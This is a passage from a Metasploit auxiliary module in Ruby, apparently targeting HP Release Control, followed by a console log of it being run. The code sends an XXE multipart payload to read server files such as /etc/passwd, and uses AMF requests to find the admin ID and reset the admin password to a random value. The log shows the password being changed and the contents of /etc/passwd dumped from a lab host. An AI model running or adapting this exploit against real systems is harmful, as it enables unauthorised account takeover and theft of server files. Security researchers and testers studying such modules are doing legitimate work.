PHlBeGlzTGFiZWw+Q291bnQ8L3lBeGlzTGFiZWw+PHNlcmllc1NvdXJjZT5MaW5lIExhYmVsPC9zZXJpZXNTb3VyY2U+PHNlcmllc0xhYmVsPkFibm9ybWFsIENoYW5nZXM8L3Nlcmllc0xhYmVsPjwvTGluZUNoYXJ0UG9ydGxldERlZmluaXRpb24+PHR5cGU+TGluZUNoYXJ0PC90eXBlPjxuYW1lPkFibm9ybWFsIENoYW5nZXMgT3ZlciBUaW1lPC9uYW1lPjx1dWlkPjMyOWM4MTJjNTE3ODNlOWU6NmE5NTIwZjM6MTE2Mzk4MTdkYTI6LTdmZWI8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjE8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+ZmFsc2U8L2V4cG9ydEFzV1NSUD48c3VwcG9ydERyaWxsVG8+dHJ1ZTwvc3VwcG9ydERyaWxsVG8+PHBvcnRsZXRDb21tU3VwPmZhbHNlPC9wb3J0bGV0Q29tbVN1cD48YnVpbHRJbj5mYWxzZTwvYnVpbHRJbj48ZGVwZW5kZW50VXVpZD41ODZkYzU4YWY0OWUyZjRlOmZmOTgwNToxMGE2MDgxMzAzNzotN2ZmYzwvZGVwZW5kZW50VXVpZD48L1BvcnRsZXREZWZpbml0aW9uPjxQb3J0bGV0RGVmaW5pdGlvbj48TGluZUNoYXJ0UG9ydGxldERlZmluaXRpb24+PENoYXJ0UG9ydGxldERlZmluaXRpb24+PEJ1aWxkZXJQb3J0bGV0RGVmaW5pdGlvbj48ZGF0YVNvdXJjZT48aWQ+T1VUQ09NRV9PVkVSX1RJTUVfREFUQV9TT1VSQ0U8L2lkPjxuYW1lPk91dGNvbWUgT3ZlciBUaW1lPC9uYW1lPjwvZGF0YVNvdXJjZT48cHJlZmVyZW5jZVN1bW1hcnlTaG93bj50cnVlPC9wcmVmZXJlbmNlU3VtbWFyeVNob3duPjxyZXF1aXJlRWRpdEJlZm9yZUZpcnN0Vmlldz5mYWxzZTwvcmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+PGhlbHBUZXh0Lz48cHJlZmVyZW5jZT48bmFtZT5GaWx0ZXI8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5GaWx0ZXI6PC9wcm9tcHQ+PGxheW91dFJvdz4wPC9sYXlvdXRSb3c+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxkZWZhdWx0VmFsdWUvPjxkaXNwbGF5T3B0aW9uPnJlcXVpcmVkRWRpdGFibGVQcmVmPC9kaXNwbGF5T3B0aW9uPjwvcHJlZmVyZW5jZT48cHJlZmVyZW5jZT48bmFtZT5Hcm91cCBCeTwvbmFtZT48dHlwZT5kcm9wZG93bjwvdHlwZT48cHJvbXB0Pkdyb3VwIEJ5OjwvcHJvbXB0PjxsYXlvdXRSb3c+MTwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPlt3ZWVrXVtXZWVrXTwvZGVmYXVsdFZhbHVlPjxkaXNwbGF5T3B0aW9uPnJlcXVpcmVkRWRpdGFibGVQcmVmPC9kaXNwbGF5T3B0aW9uPjwvcHJlZmVyZW5jZT48L0J1aWxkZXJQb3J0bGV0RGVmaW5pdGlvbj48Y2hhcnRUaXRsZT5PdXRjb21lIE92ZXIgVGltZTwvY2hhcnRUaXRsZT48Y29sb3JTb3VyY2U+Q29sb3I8L2NvbG9yU291cmNlPjx0b29sdGlwU291cmNlPlRvb2x0aXA8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uLz48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48eEF4aXNTb3VyY2U+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNTb3VyY2U+PHhBeGlzTGFiZWw+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNMYWJlbD48eUF4aXNTb3VyY2U+UGVyY2VudGFnZTwveUF4aXNTb3VyY2U+PHlBeGlzTGFiZWw+UGVyY2VudGFnZTwveUF4aXNMYWJlbD48c2VyaWVzU291cmNlPk91dGNvbWU8L3Nlcmllc1NvdXJjZT48c2VyaWVzTGFiZWw+T3V0Y29tZTwvc2VyaWVzTGFiZWw+PC9MaW5lQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48dHlwZT5MaW5lQ2hhcnQ8L3R5cGU+PG5hbWU+T3V0Y29tZSBPdmVyIFRpbWU8L25hbWU+PHV1aWQ+NmEzNjczYzlmZWI3NmRjYjotMzYyNTYxNjY6MTE3MmIyOTE1YTI6LTdmZjQ8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjE8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+ZmFsc2U8L2V4cG9ydEFzV1NSUD48c3VwcG9ydERyaWxsVG8+dHJ1ZTwvc3VwcG9ydERyaWxsVG8+PHBvcnRsZXRDb21tU3VwPmZhbHNlPC9wb3J0bGV0Q29tbVN1cD48YnVpbHRJbj5mYWxzZTwvYnVpbHRJbj48ZGVwZW5kZW50VXVpZD41ODZkYzU4YWY0OWUyZjRlOmZmOTgwNToxMGE2MDgxMzAzNzotN2ZmYzwvZGVwZW5kZW50VXVpZD48L1BvcnRsZXREZWZpbml0aW9uPjwvRXhwb3J0TGlzdD4NCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDYyNzA3NjY3MTQ4MjQ1MjA2MDQ2NjQ5OTkyNg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSIucmVwbGFjZVBvcnRsZXREZWZzIg0KDQpZDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE0NjI3MDc2NjcxNDgyNDUyMDYwNDY2NDk5OTI2DQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9Ii5yZXBsYWNlTW9kdWxlcyINCg0KWQ0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDYyNzA3NjY3MTQ4MjQ1MjA2MDQ2NjQ5OTkyNg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSIudHJpYWwiDQoNCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDYyNzA3NjY3MTQ4MjQ1MjA2MDQ2NjQ5OTkyNg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSIucmVuYW1lU3VmZml4Ig0KDQoNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ2MjcwNzY2NzE0ODI0NTIwNjA0NjY0OTk5MjYtLQ=="
)
data = data.sub(
'/etc/passwd'
, datastore[
'FILEPATH'
])
res = send_request_cgi({
'uri'
=>
'/ccm/dashboard/app/migrator/ImportResult.jsp'
,
#normalize_uri(target_uri.path, 'ccm', 'dashboard', 'app', 'migrator', 'ImportResult.jsp?IS_WINDOID=Y'),
'method'
=>
'POST'
,
'ctype'
=>
'multipart/form-data; boundary=---------------------------14627076671482452060466499926'
,
'cookie'
=> cookie,
'data'
=> data.to_s
})
select(
nil
,
nil
,
nil
,
5
)
post = {
'com.mercury.dashboard.arch.fieldtree.formForFieldtree.'
=>
'Y'
,
'.exportPortletDefsLabel'
=>
''
,
'.exportPortletDefsHidden'
=>
''
,
'.exportModulesLabel'
=>
'Release Control Default Module'
,
'.exportModulesHidden'
=>
'[98304][Release Control Default Module]'
}
res = send_request_cgi({
'uri'
=> normalize_uri(target_uri.path,
'ccm'
,
'dashboard'
,
'app'
,
'migrator'
,
'ExportResult.jsp?ISWINDOID=Y'
),
'method'
=>
'POST'
,
'data'
=>
'com.mercury.dashboard.arch.fieldtree.formForFieldtree.=Y&.exportPortletDefsLabel=&.exportPortletDefsHidden=&.exportModulesLabel=Release+Control+Default+Module&.exportModulesHidden=%5B98304%5D%5BRelease+Control+Default+Module%5D'
,
'cookie'
=> cookie
})
doc =
REXML
::Document.
new
res.body
file =
''
doc.elements.
each
(
'/ExportList/Module/description'
)
do
|element|
file = element.text
end
print file
end
def
change_admin_password(cookie, admin_id)
req = Rex::Text:
:decode_base64
(
"AAMAAAAEAARudWxsAAMvMzD/////EQkDAQqBQ09mbGV4Lm1lc3NhZ2luZy5tZXNzYWdlcy5SZW1vdGluZ01lc3NhZ2UTdGltZXN0YW1wD2hlYWRlcnMTb3BlcmF0aW9uCWJvZHkNc291cmNlHXJlbW90ZVBhc3N3b3JkHXJlbW90ZVVzZXJuYW1lFXBhcmFtZXRlcnMTbWVzc2FnZUlkFXRpbWVUb0xpdmURY2xpZW50SWQXZGVzdGluYXRpb24FAAAAAAAAAAAKIwEJRFNJZBVEU0VuZHBvaW50BklERDY4RURERS01NjFBLTMzRTQtNDU1OC04OEU3RkY2RTFDMUUGDW15LWFtZgY9dXBkYXRlVXNlcldvcmtzcGFjZUxhbmRpbmdQYWdlCQMBAwEBAQoHQ2ZsZXgubWVzc2FnaW5nLmlvLkFycmF5Q29sbGVjdGlvbgkDAQMGSURFMDdDODYxLTBBOUUtMTE2MC0xMzkyLUZEOEZBRkQ3REQ3QgUAAAAAAAAAAAZJREQ2RDEzRDUtMjEwQy0yRDA5LTAwQjktQzU0RUU3NTc0NTI2Bhd1c2VyU2VydmljZQAEbnVsbAADLzMx/////xEJAwEKgUNPZmxleC5tZXNzYWdpbmcubWVzc2FnZXMuUmVtb3RpbmdNZXNzYWdlE3RpbWVzdGFtcA9oZWFkZXJzE29wZXJhdGlvbglib2R5DXNvdXJjZR1yZW1vdGVQYXNzd29yZB1yZW1vdGVVc2VybmFtZRVwYXJhbWV0ZXJzE21lc3NhZ2VJZBV0aW1lVG9MaXZlEWNsaWVudElkF2Rlc3RpbmF0aW9uBQAAAAAAAAAACiMBCURTSWQVRFNFbmRwb2ludAZJREQ2OEVEREUtNTYxQS0zM0U0LTQ1NTgtODhFN0ZGNkUxQzFFBg1teS1hbWYGM3VwZGF0ZUdlbmVyYWxVc2VyU2V0dGluZ3MJCwECBgtlbl9VUwYVRXRjL0dNVCsxMgMDAQEBCgdDZmxleC5tZXNzYWdpbmcuaW8uQXJyYXlDb2xsZWN0aW9uCQsBAgYkBiYDAwZJQTlCNUZBRkQtQzA0Ny0zMDcyLThDQUEtRkQ4RkFGRDc2OERCBQAAAAAAAAAABklERDZEMTNENS0yMTBDLTJEMDktMDBCOS1DNTRFRTc1NzQ1MjYGF3VzZXJTZXJ2aWNlAARudWxsAAMvMzL/////EQkDAQqBQ09mbGV4Lm1lc3NhZ2luZy5tZXNzYWdlcy5SZW1vdGluZ01lc3NhZ2UTdGltZXN0YW1wD2hlYWRlcnMTb3BlcmF0aW9uCWJvZHkNc291cmNlHXJlbW90ZVBhc3N3b3JkHXJlbW90ZVVzZXJuYW1lFXBhcmFtZXRlcnMTbWVzc2FnZUlkFXRpbWVUb0xpdmURY2xpZW50SWQXZGVzdGluYXRpb24FAAAAAAAAAAAKIwEJRFNJZBVEU0VuZHBvaW50BklERDY4RURERS01NjFBLTMzRTQtNDU1OC04OEU3RkY2RTFDMUUGDW15LWFtZgYldXBkYXRlVXNlclBhc3N3b3JkCQUBBg8xNzY5NDcyBhFwYXNzdzByZAEBAQoHQ2ZsZXgubWVzc2FnaW5nLmlvLkFycmF5Q29sbGVjdGlvbgkFAQYkBiYGSUREQTlENDQ1LUNFNDgtQTFDMy00MjNBLUZEOEZBRkQ4OUUzRQUAAAAAAAAAAAZJREQ2RDEzRDUtMjEwQy0yRDA5LTAwQjktQzU0RUU3NTc0NTI2Bhd1c2VyU2VydmljZQAEbnVsbAADLzMz/////xEJAwEKgUNPZmxleC5tZXNzYWdpbmcubWVzc2FnZXMuUmVtb3RpbmdNZXNzYWdlE3RpbWVzdGFtcA9oZWFkZXJzE29wZXJhdGlvbglib2R5DXNvdXJjZR1yZW1vdGVQYXNzd29yZB1yZW1vdGVVc2VybmFtZRVwYXJhbWV0ZXJzE21lc3NhZ2VJZBV0aW1lVG9MaXZlEWNsaWVudElkF2Rlc3RpbmF0aW9uBQAAAAAAAAAACiMBCURTSWQVRFNFbmRwb2ludAZJREQ2OEVEREUtNTYxQS0zM0U0LTQ1NTgtODhFN0ZGNkUxQzFFBg1teS1hbWYGK3VwZGF0ZVVzZXJCdXNpbmVzc0NJcwkHAQYPMTc2OTQ3MgoHQ2ZsZXgubWVzc2FnaW5nLmlvLkFycmF5Q29sbGVjdGlvbgkBAQoJCQEBAQEBCgkJBwEGJAoICgwGSUU0QTk2NjU5LTQ4ODItOTc2Ny1DMzNBLUZEOEZBRkQ5NEZCQgUAAAAAAAAAAAZJREQ2RDEzRDUtMjEwQy0yRDA5LTAwQjktQzU0RUU3NTc0NTI2Bhd1c2VyU2VydmljZQo="
)
password = Rex::Text:
:rand_text_alpha
(
8
)
req = req.sub(
"\x0f1769472"
,
"\x0d"
+admin_id).sub(
"passw0rd"
, password)
send_request_cgi({
'uri'
=> normalize_uri(target_uri.path,
'ccm'
,
'messagebroker'
,
'amf'
),
'method'
=>
'POST'
,
'ctype'
=>
'application/x-amf'
,
'data'
=> req,
'cookie'
=> cookie
})
return
password
end
def
get_admin_id(cookie)
req = Rex::Text:
:decode_base64
(
"AAMAAAABAARudWxsAAMvMjkAAAIPCgAAAAERCoETT2ZsZXgubWVzc2FnaW5nLm1lc3NhZ2VzLlJlbW90aW5nTWVzc2FnZRNvcGVyYXRpb24Nc291cmNlCWJvZHkTbWVzc2FnZUlkE3RpbWVzdGFtcBFjbGllbnRJZBV0aW1lVG9MaXZlD2hlYWRlcnMXZGVzdGluYXRpb24GFXNlYXJjaFVzZXIBCREBCoFTVWNvbS5tZXJjdXJ5Lm9ueXguY2xpZW50LnNlcnZpY2VzLnZvLlVzZXJWTx91c2VyUGVybWlzc2lvbnMRcGFzc3dvcmQLZW1haWwRdXNlckFwcHMddXNlclNldHRpbmdzVk8TdXNlclJvbGVzHWxpbmVPZkJ1c2luZXNzEWxhc3ROYW1lDXVzZXJJRBNsb2dpbk5hbWUTZmlyc3ROYW1lFWJ1c2luZXNzSWQLbGFiZWwKB0NmbGV4Lm1lc3NhZ2luZy5pby5BcnJheUNvbGxlY3Rpb24JAQEBAQoJCQEBAQoJCQEBAQEBAQEBAQEGLAMJAQEEGQQBBAEGSThFNTBBNDUzLUQwRDMtMkVCNC1BNDkzLTAyMTM0RDdEM0E3NgQAAQQACgsBFURTRW5kcG9pbnQGG215LXNlY3VyZS1hbWYJRFNJZAZJRTg3MjYzOUQtOTkwRS0zOUI5LTA1MUMtMDlBOUM1RUJDQUUwAQYXdXNlclNlcnZpY2UK"
)
res = send_request_cgi({
'uri'
=> normalize_uri(target_uri.path,
'ccm'
,
'messagebroker'
,
'amfsecure'
),
'method'
=>
'POST'
,
'ctype'
=>
'application/x-amf'
,
'data'
=> req,
'cookie'
=> cookie
})
begin
idx = res.body.index(
"admin admin"
)
idx = idx +
"admin admin"
.length +
25
+
1
+
1
id = res.body[idx+
1
..idx+
6
]
return
id
rescue
return
nil
end
end
end
__END__
msf auxiliary(hp_release_control_xxe) > show options
Module
options (auxiliary/gather/hp_release_control_xxe):
Name Current Setting Required Description
---- --------------- -------- -----------
FILEPATH
/etc/passwd yes The filepath to read on the server
PASSWORD
passw0rd yes The password to authenticate with
Proxies http:
192
.
168
.
1
.
45
:
8080
no Use a proxy chain
RHOST
192
.
168
.
1
.
109
yes The target address
RPORT
8080
yes The target port
TARGETURI
/ yes Base directory path
USERNAME
username yes The username to authenticate with
VHOST
no
HTTP
server virtual host
msf auxiliary(hp_release_control_xxe) > run
[*] Authenticating
[*] Found admin id:
229376
[*] Changing admin's password...
[*] Changed admin password to: ZaDdExMx
[-] Auxiliary failed: RuntimeError Login failed:
[-] Call stack:
[-] /home/bperry/Projects/metasploit-framework/lib/msf/core/
module
.rb:
745
:in
`fail_with'
[-] /home/bperry/Projects/metasploit-framework/modules/auxiliary/gather/hp_release_control_xxe.rb:
108
:in
`run'
[*] Auxiliary
module
execution completed
msf auxiliary(hp_release_control_xxe) > run
[*] Authenticating
[*] Found admin id:
229376
[*] Changing admin's password...
[*] Changed admin password to: upvsoveu
[*] Exploiting
XXE
...
root
:x
:
0
:
0
:root
:/root:/bin/bash
bin
:x
:
1
:
1
:bin
:/bin:/sbin/nologin
daemon
:x
:
2
:
2
:daemon
:/sbin:/sbin/nologin
adm
:x
:
3
:
4
:adm
:/var/adm:/sbin/nologin
lp
:x
:
4
:
7
:lp
:/var/spool/lpd:/sbin/nologin
sync
:x
:
5
:
0
:sync
:/sbin:/bin/sync
shutdown
:x
:
6
:
0
:shutdown
:/sbin:/sbin/shutdown
halt
:x
:
7
:
0
:halt
:/sbin:/sbin/halt
mail
:x
:
8
:
12
:mail
:/var/spool/mail:/sbin/nologin
uucp
:x
:
10
:
14
:uucp
:/var/spool/uucp:/sbin/nologin
operator
:x
:
11
:
0
:operator
:/root:/sbin/nologin
games
:x
:
12
:
100
:games
:/usr/games:/sbin/nologin
gopher
:x
:
13
:
30
:gopher
:/var/gopher:/sbin/nologin
ftp
:x
:
14
:
50
:
FTP
User:/var/ftp:/sbin/nologin
nobody
:x
:
99
:
99
:Nobody:/:/sbin/nologin
dbus
:x
:
81
:
81
:System message bus:/:/sbin/nologin
vcsa
:x
:
69
:
69
:virtual
console memory owner:/dev:/sbin/nologin
rpc
:x
:
32
:
32
:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
abrt
:x
:
173
:
173
::/etc/abrt:/sbin/nologin
rpcuser
:x
:
29
:
29
:
RPC
Service User:/var/lib/nfs:/sbin/nologin
nfsnobody
:x
:
65534
:
65534
:Anonymous
NFS
User:/var/lib/nfs:/sbin/nologin
haldaemon
:x
:
68
:
68
:
HAL
daemon:/:/sbin/nologin
ntp
:x
:
38
:
38
::/etc/ntp:/sbin/nologin
saslauth
:x
:
499
:
76
:
"Saslauthd user"
:/var/empty/saslauth:/sbin/nologin
postfix
:x
:
89
:
89
::/var/spool/postfix:/sbin/nologin
sshd
:x
:
74
:
74
:Privilege-separated
SSH
:/var/empty/sshd:/sbin/nologin
tcpdump
:x
:
72
:
72
::/:/sbin/nologin
oprofile
:x
:
16
:
16
:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
release-control
:x
:
500
:
500
::/opt/
HP
/rc:/bin/bash
rtkit
:x
:
498
:
496
:RealtimeKit:/proc:/sbin/nologin
pulse
:x
:
497
:
495
:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gdm
:x
:
42
:
42
::/var/lib/gdm:/sbin/nologin
avahi-autoipd
:x
:
170
:
170
:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
fdsa
:x
:
501
:
501
::/home/fdsa:/bin/bash
[*] Auxiliary
module
execution completed